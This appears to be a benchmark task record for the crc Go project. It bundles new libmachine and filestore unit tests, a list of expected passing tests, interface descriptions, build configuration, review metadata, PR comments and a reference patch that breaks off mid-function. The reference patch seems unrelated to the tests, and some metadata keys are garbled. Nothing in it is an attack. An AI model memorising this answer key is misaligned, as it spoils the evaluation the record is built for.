b/pkg/libmachine/mcnutils/utils_test.go @@ -0,0 +1,85 @@ +package mcnutils + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +func TestCopyFile(t *testing.T) { + testStr := "test-machine" + + srcFile, err := ioutil.TempFile("", "machine-test-") + if err != nil { + t.Fatal(err) + } + srcFi, err := srcFile.Stat() + if err != nil { + t.Fatal(err) + } + + _, _ = srcFile.Write([]byte(testStr)) + srcFile.Close() + + srcFilePath := filepath.Join(os.TempDir(), srcFi.Name()) + + destFile, err := ioutil.TempFile("", "machine-copy-test-") + if err != nil { + t.Fatal(err) + } + + 
destFi, err := destFile.Stat() + if err != nil { + t.Fatal(err) + } + + destFile.Close() + + destFilePath := filepath.Join(os.TempDir(), destFi.Name()) + + if err := CopyFile(srcFilePath, destFilePath); err != nil { + t.Fatal(err) + } + + data, err := ioutil.ReadFile(destFilePath) + if err != nil { + t.Fatal(err) + } + + if string(data) != testStr { + t.Fatalf("expected data \"%s\"; received \"%s\"", testStr, string(data)) + } +} + +func TestGenerateRandomID(t *testing.T) { + id := GenerateRandomID() + + if len(id) != 64 { + t.Fatalf("Id returned is incorrect: %s", id) + } +} + +func TestShortenId(t *testing.T) { + id := GenerateRandomID() + truncID := TruncateID(id) + if len(truncID) != 12 { + t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID) + } +} + +func TestShortenIdEmpty(t *testing.T) { + id := "" + truncID := TruncateID(id) + if len(truncID) > len(id) { + t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID) + } +} + +func TestShortenIdInvalid(t *testing.T) { + id := "1234" + truncID := TruncateID(id) + if len(truncID) != len(id) { + t.Fatalf("Id returned is incorrect: truncate on %s returned %s", id, truncID) + } +} diff --git a/pkg/libmachine/persist/filestore_test.go b/pkg/libmachine/persist/filestore_test.go new file mode 100644 index 000000000..bd8a62d7d --- /dev/null +++ b/pkg/libmachine/persist/filestore_test.go @@ -0,0 +1,205 @@ +package persist + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "os" + "path/filepath" + "regexp" + "testing" + + "github.com/code-ready/crc/pkg/drivers/none" + "github.com/code-ready/crc/pkg/libmachine/host" + "github.com/code-ready/crc/pkg/libmachine/hosttest" +) + +func cleanup() { + os.RemoveAll(os.Getenv("MACHINE_STORAGE_PATH")) +} + +func getTestStore() Filestore { + tmpDir, err := ioutil.TempDir("", "machine-test-") + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + return Filestore{ + Path: tmpDir, + } +} + +func TestStoreSave(t *testing.T) { + defer 
cleanup() + + store := getTestStore() + + h, err := hosttest.GetDefaultTestHost() + if err != nil { + t.Fatal(err) + } + + if err := store.Save(h); err != nil { + t.Fatal(err) + } + + path := filepath.Join(store.GetMachinesDir(), h.Name) + if _, err := os.Stat(path); os.IsNotExist(err) { + t.Fatalf("Host path doesn't exist: %s", path) + } + + files, _ := ioutil.ReadDir(path) + for _, f := range files { + r := regexp.MustCompile("config.json.tmp*") + if r.MatchString(f.Name()) { + t.Fatalf("Failed to remove temp filestore:%s", f.Name()) + } + } +} + +func TestStoreSaveOmitRawDriver(t *testing.T) { + defer cleanup() + + store := getTestStore() + + h, err := hosttest.GetDefaultTestHost() + if err != nil { + t.Fatal(err) + } + + if err := store.Save(h); err != nil { + t.Fatal(err) + } + + configJSONPath := filepath.Join(store.GetMachinesDir(), h.Name, "config.json") + + f, err := os.Open(configJSONPath) + if err != nil { + t.Fatal(err) + } + + configData, err := ioutil.ReadAll(f) + if err != nil { + t.Fatal(err) + } + + fakeHost := make(map[string]interface{}) + + if err := json.Unmarshal(configData, &fakeHost); err != nil { + t.Fatal(err) + } + + if rawDriver, ok := fakeHost["RawDriver"]; ok { + t.Fatal("Should not have gotten a value for RawDriver reading host from disk but got one: ", rawDriver) + } + +} + +func TestStoreRemove(t *testing.T) { + defer cleanup() + + store := getTestStore() + + h, err := hosttest.GetDefaultTestHost() + if err != nil { + t.Fatal(err) + } + + if err := store.Save(h); err != nil { + t.Fatal(err) + } + + path := filepath.Join(store.GetMachinesDir(), h.Name) + if _, err := os.Stat(path); os.IsNotExist(err) { + t.Fatalf("Host path doesn't exist: %s", path) + } + + err = store.Remove(h.Name) + if err != nil { + t.Fatal(err) + } + + if _, err := os.Stat(path); err == nil { + t.Fatalf("Host path still exists after remove: %s", path) + } +} + +func TestStoreExists(t *testing.T) { + defer cleanup() + store := getTestStore() + + h, err := 
hosttest.GetDefaultTestHost() + if err != nil { + t.Fatal(err) + } + + exists, err := store.Exists(h.Name) + if err != nil { + t.Fatal(err) + } + if exists { + t.Fatal("Host should not exist before saving") + } + + if err := store.Save(h); err != nil { + t.Fatal(err) + } + + if err := store.SetExists(h.Name); err != nil { + t.Fatal(err) + } + + exists, err = store.Exists(h.Name) + if err != nil { + t.Fatal(err) + } + + if !exists { + t.Fatal("Host should exist after saving") + } + + if err := store.Remove(h.Name); err != nil { + t.Fatal(err) + } + + exists, err = store.Exists(h.Name) + if err != nil { + t.Fatal(err) + } + + if exists { + t.Fatal("Host should not exist after removing") + } +} + +func TestStoreLoad(t *testing.T) { + defer cleanup() + + store := getTestStore() + + h, err := hosttest.GetDefaultTestHost() + if err != nil { + t.Fatal(err) + } + + if err := store.Save(h); err != nil { + t.Fatal(err) + } + + h, err = store.Load(h.Name) + if err != nil { + t.Fatal(err) + } + + rawDataDriver, ok := h.Driver.(*host.RawDataDriver) + if !ok { + t.Fatal("Expected driver loaded from store to be of type *host.RawDataDriver and it was not") + } + + realDriver := none.NewDriver(h.Name, store.Path) + + if err := json.Unmarshal(rawDataDriver.Data, &realDriver); err != nil { + t.Fatalf("Error unmarshaling rawDataDriver data into concrete 'none' driver: %s", err) + } +}
[ "TestApi", "TestSetconfigApi", "TestGetconfigApi", "TestGetClusterOperatorsStatus", "TestGetClusterOperatorsStatusProgressing", "TestGetClusterOperatorStatus", "TestGetClusterOperatorStatusNotFound", "TestSuccessfullyApplied", "TestViperConfigUnknown", "TestViperConfigSetAndGet", "TestViperConfigUnsetAndGet", "TestViperConfigSetReloadAndGet", "TestViperConfigLoadDefaultValue", "TestViperConfigBindFlagSet", "TestViperConfigCastSet", "TestCannotSetWithWrongType", "TestCannotGetWithWrongType", "TestRetryAfter", "TestRetryAfterFailure", "TestRetryAfterSlowFailure", "TestRetryAfterMaxAttempts", "TestRetryAfterSuccessAfterFailures", "TestMultiErrorString", "TestCertificateAuthority", "TestUnmarshalMarshal", "TestUse", "TestExtract", "TestVersionCheck", "TestValidateProxyURL", "TestRunCommand", "TestRunCommandWithoutContextAndCluster", "TestCountConfigurationOptions", "TestCountPreflights", "TestCheckPreflight", "TestSkipPreflight", "TestFixPreflight", "TestCheckAppArmor", "TestFixAppArmor", "TestCleanupAppArmor", "TestClientUploadWithConsent", "TestClientUploadWithOutConsent", "TestNewKeyPair", "TestRunner", "TestGenerateSSHKey", "TestSystemd", "TestSystemdStatuses", "TestUncompress", "TestUnCompressBundle", "TestValidateHostnameValid", "TestValidateHostnameInvalid", "TestLoadUnsupportedConfiguration", "TestLoadHost", "TestCopyFile", "TestGenerateRandomID", "TestShortenId", "TestShortenIdEmpty", "TestShortenIdInvalid", "TestStoreSave", "TestStoreSaveOmitRawDriver", "TestStoreRemove", "TestStoreExists", "TestStoreLoad", "TestReplaceEnv", "TestAddEnv", "TestFileContentFuncs", "TestParseOsRelease", "TestParseLine", "TestDetectBash", "TestDetectFish", "TestUnknownShell" ]
[]
Method: Filestore.SetExists(hostName string) error Location: pkg/libmachine/persist/filestore.go Inputs: - **hostName** (string): the name of the machine whose existence flag should be recorded in the filestore. Outputs: - **error**: nil on success, or a non‑nil error if the flag cannot be written (e.g., I/O failure, permission issue). Description: Persists a marker that a host with the given name is now present in the filestore. This method is used after a successful `Save` to make the store report the host as existing when `Exists` is called. Method: Filestore.Exists(hostName string) (bool, error) Location: pkg/libmachine/persist/store.go (via Store interface implementation) Inputs: - **hostName** (string): the name of the machine to check. Outputs: - **bool**: true if the host’s directory and marker file are present, false otherwise. - **error**: non‑nil if the check could not be performed (e.g., I/O error). Description: Returns whether a host with the given name is recorded in the filestore. Used in tests to verify presence before and after `Save`/`Remove`. Function: ValidateHostName(name string) bool Location: pkg/libmachine/host/host.go Inputs: - **name** (string): hostname to validate. Outputs: - **bool**: true if the hostname complies with allowed patterns (alphanumeric, dashes, dots, no special characters); false otherwise. Description: Checks that a hostname is syntactically valid. Tests call it with valid and invalid examples. Function: MigrateHost(name string, data []byte) (*Host, error) Location: pkg/libmachine/host/migrate.go Inputs: - **name** (string): name to assign to the host being loaded. - **data** ( []byte ): JSON representation of the persisted host configuration. Outputs: - **\*Host**: populated Host struct when migration succeeds. - **error**: `errUnexpectedConfigVersion` if the `ConfigVersion` in the JSON is not supported, otherwise any unmarshalling or driver‑creation error. 
Description: Loads a host configuration from legacy JSON, performing version checks and driver reconstruction. Tests verify error handling for unsupported config versions and successful loading. Function: CopyFile(srcPath string, dstPath string) error Location: pkg/libmachine/mcnutils/utils.go Inputs: - **srcPath** (string): path to the source file. - **dstPath** (string): path where the file should be copied. Outputs: - **error**: nil on success; otherwise an I/O error. Description: Copies the contents of one file to another, preserving permissions. Used in utils tests. Function: GenerateRandomID() string Location: pkg/libmachine/mcnutils/utils.go Inputs: none Outputs: - **string**: a 64‑character hexadecimal random identifier. Description: Produces a random machine identifier; tests assert its length. Function: TruncateID(id string) string Location: pkg/libmachine/mcnutils/utils.go Inputs: - **id** (string): identifier to shorten. Outputs: - **string**: first 12 characters of a valid 64‑char ID, or the original string if it is empty or shorter than 12 characters. Description: Shortens a full identifier for display; tests cover normal, empty, and short inputs.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive && apt-get update -qq && apt-get install -y -qq golang", "export GOPATH=$HOME/go && export GOCACHE=$HOME/.cache/go-build && export XDG_CACHE_HOME=$HOME/.cache && export HOME=/tmp && mkdir -p $GOCACHE $HOME", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "make test" }
{ "num_modified_files": 18, "num_modified_lines": 47, "pr_author": "guillaumerose", "pr_labels": [ "approved", "lgtm" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [ "https://github.com/code-ready/machine/pull/54" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "dev_ops_enh" ], "reason": null, "reasoning": "The issue requests importing most of the machine code into the crc repository and updating imports, essentially a large refactor. The supplied test patch defines the expected behavior by exercising host validation, migration, persistence, and utility functions, which aligns with the refactor goal. The problem statement does not contain ambiguous requirements beyond the test expectations, and the tests cover the needed functionality, so the task is solvable (A). 
No misalignments with the tests are observed.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
7b098c1bcaad0422dad36a390f8b335a9554548e
2021-01-05 10:11:01
openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1815#" title="Author self-approved">praveenkumar</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [praveenkumar] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} --> guillaumerose: Good! Should we also change the returned struct and remove the boolean KubeletStarted ? gbraad: > remove KubeletStarted most likely cfergeau: > > remove KubeletStarted > > most likely Wouldn't this be useful when podman support comes back?
code-ready__crc-1815
diff --git a/cmd/crc/cmd/config/config.go b/cmd/crc/cmd/config/config.go index 6a191653b..4aa2e4cdb 100644 --- a/cmd/crc/cmd/config/config.go +++ b/cmd/crc/cmd/config/config.go @@ -52,22 +52,15 @@ func RegisterSettings(cfg *config.Config) { } func isPreflightKey(key string) bool { - return strings.HasPrefix(key, "skip-") || strings.HasPrefix(key, "warn-") + return strings.HasPrefix(key, "skip-") } // less is used to sort the config keys. We want to sort first the regular keys, and -// then the keys related to preflight starting with a skip- or warn- prefix. We want -// these preflight keys to be grouped by pair: 'skip-bar', 'warn-bar', 'skip-foo', 'warn-foo' -// would be sorted in that order. +// then the keys related to preflight starting with a skip- prefix. func less(lhsKey, rhsKey string) bool { if isPreflightKey(lhsKey) { if isPreflightKey(rhsKey) { - // lhs is preflight, rhs is preflight - if lhsKey[4:] == rhsKey[4:] { - // we want skip-foo before warn-foo - return lhsKey < rhsKey - } - // ignore skip-/warn- prefix + // ignore skip prefix return lhsKey[4:] < rhsKey[4:] } // lhs is preflight, rhs is not preflight diff --git a/cmd/crc/cmd/root.go b/cmd/crc/cmd/root.go index deac2af5f..1c2b96adf 100644 --- a/cmd/crc/cmd/root.go +++ b/cmd/crc/cmd/root.go @@ -5,6 +5,7 @@ import ( "io/ioutil" "os" "strings" + "time" cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -174,13 +175,13 @@ func addForceFlag(cmd *cobra.Command) { func executeWithLogging(fullCmd string, input func(cmd *cobra.Command, args []string) error) func(cmd *cobra.Command, args []string) error { return func(cmd *cobra.Command, args []string) error { - if err := input(cmd, args); err != nil { - if serr := segmentClient.Upload(fullCmd, err); serr != nil { - fmt.Println(serr.Error()) - } - return err + logging.Debugf("Running '%s'", fullCmd) + startTime := time.Now() + err := input(cmd, args) + if serr := segmentClient.Upload(fullCmd, 
time.Since(startTime), err); serr != nil { + logging.Debugf("Cannot send data to telemetry: %v", serr) } - return nil + return err } } diff --git a/docs/source/topics/con_about-codeready-containers-configuration.adoc b/docs/source/topics/con_about-codeready-containers-configuration.adoc index 160bc0043..8c858f24c 100644 --- a/docs/source/topics/con_about-codeready-containers-configuration.adoc +++ b/docs/source/topics/con_about-codeready-containers-configuration.adoc @@ -9,4 +9,4 @@ Run the [command]`{bin} config --help` command to list the available properties. You can also use the [command]`{bin} config` command to configure the behavior of the startup checks for the [command]`{bin} start` and [command]`{bin} setup` commands. By default, startup checks report an error and stop execution when their conditions are not met. -Set the value of a property starting with `skip-check` or `warn-check` to `true` to skip the check or report a warning rather than an error, respectively. +Set the value of a property starting with `skip-check` to `true` to skip the check. diff --git a/pkg/crc/machine/start.go b/pkg/crc/machine/start.go index ad4b6b641..545c51c18 100644 --- a/pkg/crc/machine/start.go +++ b/pkg/crc/machine/start.go @@ -23,7 +23,6 @@ import ( "github.com/code-ready/crc/pkg/crc/ssh" crcssh "github.com/code-ready/crc/pkg/crc/ssh" "github.com/code-ready/crc/pkg/crc/systemd" - "github.com/code-ready/crc/pkg/crc/systemd/states" crcos "github.com/code-ready/crc/pkg/os" "github.com/code-ready/machine/libmachine" "github.com/code-ready/machine/libmachine/drivers" @@ -350,12 +349,6 @@ func (client *client) Start(startConfig StartConfig) (*StartResult, error) { } } - // Check if kubelet service is running inside the VM - kubeletStatus, err := sd.Status("kubelet") - if err != nil || kubeletStatus != states.Running { - return nil, errors.Wrap(err, "kubelet service is not running") - } - // In Openshift 4.3, when cluster comes up, the following happens // 1. 
After the openshift-apiserver pod is started, its log contains multiple occurrences of `certificate has expired or is not yet valid` // 2. Initially there is no request-header's client-ca crt available to `extension-apiserver-authentication` configmap diff --git a/pkg/crc/preflight/preflight.go b/pkg/crc/preflight/preflight.go index 7652758ab..ada6d0e19 100644 --- a/pkg/crc/preflight/preflight.go +++ b/pkg/crc/preflight/preflight.go @@ -50,20 +50,6 @@ func (check *Check) shouldSkip(config config.Storage) bool { return config.Get(check.getSkipConfigName()).AsBool() } -func (check *Check) getWarnConfigName() string { - if check.configKeySuffix == "" { - return "" - } - return "warn-" + check.configKeySuffix -} - -func (check *Check) shouldWarn(config config.Storage) bool { - if check.configKeySuffix == "" { - return false - } - return config.Get(check.getWarnConfigName()).AsBool() -} - func (check *Check) doCheck(config config.Storage) error { if check.checkDescription == "" { panic(fmt.Sprintf("Should not happen, empty description for check '%s'", check.configKeySuffix)) @@ -110,13 +96,8 @@ func doPreflightChecks(config config.Storage, checks []Check) error { if check.flags&SetupOnly == SetupOnly || check.flags&CleanUpOnly == CleanUpOnly { continue } - err := check.doCheck(config) - if err != nil { - if check.shouldWarn(config) { - logging.Warn(err.Error()) - } else { - return err - } + if err := check.doCheck(config); err != nil { + return err } } return nil @@ -131,13 +112,8 @@ func doFixPreflightChecks(config config.Storage, checks []Check) error { if err == nil { continue } - err = check.doFix() - if err != nil { - if check.shouldWarn(config) { - logging.Warn(err.Error()) - } else { - return err - } + if err = check.doFix(); err != nil { + return err } } return nil @@ -169,7 +145,6 @@ func doRegisterSettings(cfg config.Schema, checks []Check) { for _, check := range checks { if check.configKeySuffix != "" { cfg.AddSetting(check.getSkipConfigName(), false, 
config.ValidateBool, config.SuccessfullyApplied) - cfg.AddSetting(check.getWarnConfigName(), false, config.ValidateBool, config.SuccessfullyApplied) } } } diff --git a/pkg/crc/preflight/preflight_checks_linux.go b/pkg/crc/preflight/preflight_checks_linux.go index eda0353fb..41b03a9a3 100644 --- a/pkg/crc/preflight/preflight_checks_linux.go +++ b/pkg/crc/preflight/preflight_checks_linux.go @@ -144,10 +144,10 @@ func fixLibvirtInstalled(distro *linux.OsRelease) func() error { func installLibvirtCommand(distro *linux.OsRelease) string { yumCommand := "yum install -y libvirt libvirt-daemon-kvm qemu-kvm" - switch distroID(distro) { - case linux.Ubuntu: + switch { + case distroIsLike(distro, linux.Ubuntu): return "apt-get update && apt-get install -y libvirt-daemon libvirt-daemon-system libvirt-clients" - case linux.RHEL, linux.CentOS, linux.Fedora: + case distroIsLike(distro, linux.Fedora): return yumCommand default: logging.Warnf("unsupported distribution %s, trying to install libvirt with yum", distro) diff --git a/pkg/crc/preflight/preflight_checks_network_linux.go b/pkg/crc/preflight/preflight_checks_network_linux.go index bc78d6802..ca22b3ea9 100644 --- a/pkg/crc/preflight/preflight_checks_network_linux.go +++ b/pkg/crc/preflight/preflight_checks_network_linux.go @@ -72,22 +72,27 @@ server=/crc.testing/192.168.130.11 dns=dnsmasq ` - crcNetworkManagerDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "pre-up.d", "99-crc.sh") - crcNetworkManagerDispatcherConfig = `#!/bin/sh + crcNetworkManagerOldDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "pre-up.d", "99-crc.sh") + crcNetworkManagerDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "99-crc.sh") + crcNetworkManagerDispatcherConfig = `#!/bin/sh # This is a NetworkManager dispatcher script to configure split DNS for # the 'crc' libvirt network. 
-# The corresponding crc bridge is recreated each time the system reboots, so -# it cannot be configured permanently through NetworkManager. -# Changing DNS settings with nmcli requires the connection to go down/up, -# so we directly make the change using resolvectl +# +# The corresponding crc bridge is not created through NetworkManager, so +# it cannot be configured permanently through NetworkManager. We make the +# change directly using resolvectl instead. +# +# NetworkManager will overwrite this resolvectl configuration every time a +# network connection goes up/down, so we run this script on each of these events +# to restore our settings. This is a NetworkManager bug which is fixed in +# version 1.26.6 by this commit: +# https://cgit.freedesktop.org/NetworkManager/NetworkManager/commit/?id=ee4e679bc7479de42780ebd8e3a4d74afa2b2ebe export LC_ALL=C -if [ "$1" = crc ]; then - resolvectl domain "$1" ~testing - resolvectl dns "$1" 192.168.130.11 - resolvectl default-route "$1" false -fi +resolvectl domain crc ~testing +resolvectl dns crc 192.168.130.11 +resolvectl default-route crc false exit 0 ` @@ -266,6 +271,10 @@ func checkCrcNetworkManagerDispatcherFile() error { func fixCrcNetworkManagerDispatcherFile() error { logging.Debug("Fixing NetworkManager dispatcher configuration") + + // Remove dispatcher script which was used in crc 1.20 - it's been moved to a new location + _ = removeNetworkManagerConfigFile(crcNetworkManagerOldDispatcherPath) + err := fixNetworkManagerConfigFile(crcNetworkManagerDispatcherPath, crcNetworkManagerDispatcherConfig, 0755) if err != nil { return err @@ -276,6 +285,9 @@ func fixCrcNetworkManagerDispatcherFile() error { } func removeCrcNetworkManagerDispatcherFile() error { + // Remove dispatcher script which was used in crc 1.20 - it's been moved to a new location + _ = removeNetworkManagerConfigFile(crcNetworkManagerOldDispatcherPath) + return removeNetworkManagerConfigFile(crcNetworkManagerDispatcherPath) } diff --git 
a/pkg/crc/preflight/preflight_checks_tray_darwin.go b/pkg/crc/preflight/preflight_checks_tray_darwin.go index 05961eee0..ee31ee2fd 100644 --- a/pkg/crc/preflight/preflight_checks_tray_darwin.go +++ b/pkg/crc/preflight/preflight_checks_tray_darwin.go @@ -195,7 +195,9 @@ func downloadOrExtractTrayApp() error { }() logging.Debug("Trying to extract tray from crc executable") - err = embed.Extract(filepath.Base(constants.GetCRCMacTrayDownloadURL()), tmpArchivePath) + trayFileName := filepath.Base(constants.GetCRCMacTrayDownloadURL()) + trayDestFileName := filepath.Join(tmpArchivePath, trayFileName) + err = embed.Extract(trayFileName, trayDestFileName) if err != nil { logging.Debug("Could not extract tray from crc executable", err) logging.Debug("Downloading crc tray") @@ -204,15 +206,14 @@ func downloadOrExtractTrayApp() error { return err } } - archivePath := filepath.Join(tmpArchivePath, filepath.Base(constants.GetCRCMacTrayDownloadURL())) outputPath := constants.CrcBinDir err = goos.MkdirAll(outputPath, 0750) if err != nil { return errors.Wrap(err, "Cannot create the target directory.") } - _, err = extract.Uncompress(archivePath, outputPath, false) + _, err = extract.Uncompress(trayDestFileName, outputPath, false) if err != nil { - return errors.Wrapf(err, "Cannot uncompress '%s'", archivePath) + return errors.Wrapf(err, "Cannot uncompress '%s'", trayDestFileName) } return nil } diff --git a/pkg/crc/preflight/preflight_checks_tray_windows.go b/pkg/crc/preflight/preflight_checks_tray_windows.go index 501984608..d2493018d 100644 --- a/pkg/crc/preflight/preflight_checks_tray_windows.go +++ b/pkg/crc/preflight/preflight_checks_tray_windows.go @@ -161,7 +161,9 @@ func fixTrayExecutableExists() error { }() logging.Debug("Trying to extract tray from crc executable") - err = embed.Extract(filepath.Base(constants.GetCRCWindowsTrayDownloadURL()), tmpArchivePath) + trayFileName := filepath.Base(constants.GetCRCWindowsTrayDownloadURL()) + trayDestFileName := 
filepath.Join(tmpArchivePath, trayFileName) + err = embed.Extract(trayFileName, trayDestFileName) if err != nil { logging.Debug("Could not extract tray from crc executable", err) logging.Debug("Downloading crc tray") @@ -170,10 +172,9 @@ func fixTrayExecutableExists() error { return err } } - archivePath := filepath.Join(tmpArchivePath, filepath.Base(constants.GetCRCWindowsTrayDownloadURL())) - _, err = extract.Uncompress(archivePath, constants.TrayExecutableDir, false) + _, err = extract.Uncompress(trayDestFileName, constants.TrayExecutableDir, false) if err != nil { - return fmt.Errorf("Cannot uncompress '%s': %v", archivePath, err) + return fmt.Errorf("Cannot uncompress '%s': %v", trayDestFileName, err) } return nil diff --git a/pkg/crc/preflight/preflight_linux.go b/pkg/crc/preflight/preflight_linux.go index c62be4746..e2587c8c1 100644 --- a/pkg/crc/preflight/preflight_linux.go +++ b/pkg/crc/preflight/preflight_linux.go @@ -8,6 +8,7 @@ import ( "strings" "syscall" + crcErrors "github.com/code-ready/crc/pkg/crc/errors" "github.com/code-ready/crc/pkg/crc/logging" "github.com/code-ready/crc/pkg/crc/network" crcos "github.com/code-ready/crc/pkg/os" @@ -71,7 +72,7 @@ func libvirtPreflightChecks(distro *linux.OsRelease) []Check { flags: CleanUpOnly, }, } - if distroID(distro) == linux.Ubuntu { + if distroIsLike(distro, linux.Ubuntu) { checks = append(checks, ubuntuPreflightChecks...) 
} return checks @@ -97,13 +98,20 @@ var libvirtNetworkPreflightChecks = [...]Check{ } var vsockPreflightChecks = Check{ - configKeySuffix: "check-vsock", - checkDescription: "Checking if vsock is correctly configured", - check: checkVsock, - fixDescription: "Checking if vsock is correctly configured", - fix: fixVsock, + configKeySuffix: "check-vsock", + checkDescription: "Checking if vsock is correctly configured", + check: checkVsock, + fixDescription: "Checking if vsock is correctly configured", + fix: fixVsock, + cleanupDescription: "Removing vsock configuration", + cleanup: removeVsockCrcSettings, } +const ( + vsockUdevRulesPath = "/usr/lib/udev/rules.d/99-crc-vsock.rules" + vsockModuleAutoLoadConfPath = "/etc/modules-load.d/vhost_vsock.conf" +) + func checkVsock() error { executable, err := os.Executable() if err != nil { @@ -126,7 +134,7 @@ func checkVsock() error { return err } if group.Name != "libvirt" { - return errors.New("/dev/vsock is not is the right group") + return errors.New("/dev/vsock is not in the right group") } } else { return errors.New("cannot cast info") @@ -146,21 +154,39 @@ func fixVsock() error { if err != nil { return err } - _, _, err = crcos.RunWithPrivilege("modprobe vhost_vsock", "modprobe", "vhost_vsock") + + udevRule := `KERNEL=="vsock", MODE="0660", OWNER="root", GROUP="libvirt"` + err = crcos.WriteToFileAsRoot("Create udev rule for /dev/vsock", udevRule, vsockUdevRulesPath, 0644) if err != nil { return err } - _, _, err = crcos.RunWithPrivilege("chown /dev/vsock", "chown", "root:libvirt", "/dev/vsock") + err = crcos.WriteToFileAsRoot(fmt.Sprintf("Create file %s", vsockModuleAutoLoadConfPath), "vhost_vsock", vsockModuleAutoLoadConfPath, 0644) if err != nil { return err } - _, _, err = crcos.RunWithPrivilege("chmod /dev/vsock", "chmod", "g+rw", "/dev/vsock") + _, _, err = crcos.RunWithPrivilege("modprobe vhost_vsock", "modprobe", "vhost_vsock") if err != nil { return err } return nil } +func removeVsockCrcSettings() error { + var 
mErr crcErrors.MultiError + _, _, err := crcos.RunWithPrivilege(fmt.Sprintf("rm %s", vsockUdevRulesPath), "rm", "-f", vsockUdevRulesPath) + if err != nil { + mErr.Collect(err) + } + _, _, err = crcos.RunWithPrivilege(fmt.Sprintf("rm %s", vsockModuleAutoLoadConfPath), "rm", "-f", vsockModuleAutoLoadConfPath) + if err != nil { + mErr.Collect(err) + } + if len(mErr.Errors) == 0 { + return nil + } + return mErr +} + func getAllPreflightChecks() []Check { checks := getPreflightChecksForDistro(distro(), network.DefaultMode) checks = append(checks, vsockPreflightChecks) @@ -180,7 +206,7 @@ func getNetworkChecksForDistro(distro *linux.OsRelease, networkMode network.Mode switch { default: - logging.Warnf("distribution-specific preflight checks are not implemented for '%s'", distroID(distro)) + logging.Warnf("distribution-specific preflight checks are not implemented for '%s'", distro.ID) fallthrough case distroIsLike(distro, linux.Ubuntu), distroIsLike(distro, linux.Fedora): checks = append(checks, nmPreflightChecks[:]...) 
@@ -207,25 +233,17 @@ func getPreflightChecksForDistro(distro *linux.OsRelease, networkMode network.Mo return checks } -func usesSystemdResolved(osRelease *linux.OsRelease) bool { - switch distroID(osRelease) { - case linux.Ubuntu: +func usesSystemdResolved(distro *linux.OsRelease) bool { + switch { + case distroIsLike(distro, linux.Ubuntu): return true - case linux.Fedora: - return osRelease.VersionID >= "33" + case distro.ID == linux.Fedora: + return distro.VersionID >= "33" default: return false } } -func distroID(osRelease *linux.OsRelease) linux.OsType { - if osRelease == nil { - return "unknown" - } - // FIXME: should also use IDLike - return osRelease.ID -} - func distroIsLike(osRelease *linux.OsRelease, osType linux.OsType) bool { if osRelease == nil { return false @@ -246,8 +264,10 @@ func distroIsLike(osRelease *linux.OsRelease, osType linux.OsType) bool { func distro() *linux.OsRelease { distro, err := linux.GetOsRelease() if err != nil { - logging.Warnf("cannot get distribution name: %v", err) - return nil + logging.Errorf("cannot get distribution name: %v", err) + return &linux.OsRelease{ + ID: "unknown", + } } return distro } diff --git a/pkg/crc/segment/segment.go b/pkg/crc/segment/segment.go index 254dfb386..e9ac423c4 100644 --- a/pkg/crc/segment/segment.go +++ b/pkg/crc/segment/segment.go @@ -4,7 +4,9 @@ import ( "io/ioutil" "os" "path/filepath" + "runtime" "strings" + "time" "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -53,24 +55,35 @@ func (c *Client) Close() error { return c.segmentClient.Close() } -func (c *Client) Upload(action string, err error) error { +func (c *Client) Upload(action string, duration time.Duration, err error) error { if !c.config.Get(config.ConsentTelemetry).AsBool() { return nil } - logging.Debug("Uploading the error to segment") anonymousID, uerr := getUserIdentity(c.telemetryFilePath) if uerr != nil { return uerr } - t := analytics.NewTraits(). 
